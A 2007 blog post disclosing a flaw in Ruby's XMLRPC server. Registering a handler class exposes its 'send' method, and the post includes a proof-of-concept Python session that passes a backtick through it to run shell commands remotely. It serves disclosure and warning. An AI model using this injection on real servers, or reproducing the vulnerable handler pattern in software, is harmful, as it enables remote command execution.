lucumr

Looks like the Ruby XMLRPC implementation still has a vulnerability:

#!/usr/bin/env ruby
require 'xmlrpc/server'

class TestHandler
  def foo
    42
  end
end

if __FILE__ == $0
  srv = XMLRPC::Server.new(5000)
  srv.add_handler('test', TestHandler.new)
  srv.serve
end

Connecting to it with the python shell now does this:

>>> from xmlrpclib import ServerProxy
>>> p = ServerProxy("http://localhost:5000/")
>>> p.test.send('foo')
42
>>> p.test.send('`', 'echo "Shit"')
'Shit\n'

And something tells me there is no way to avoid this problem, so better just not use add_handler with a class. Explicit is better than implicit.

Update after some googeling i found someone that discovered the same: Ruby, Python, and an XML-RPC Server Arbitrary Shell Command Execution Flaw.

This entry was posted on Saturday, June 23rd, 2007 at 5:30 pm and tagged as security, caveat, ruby. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.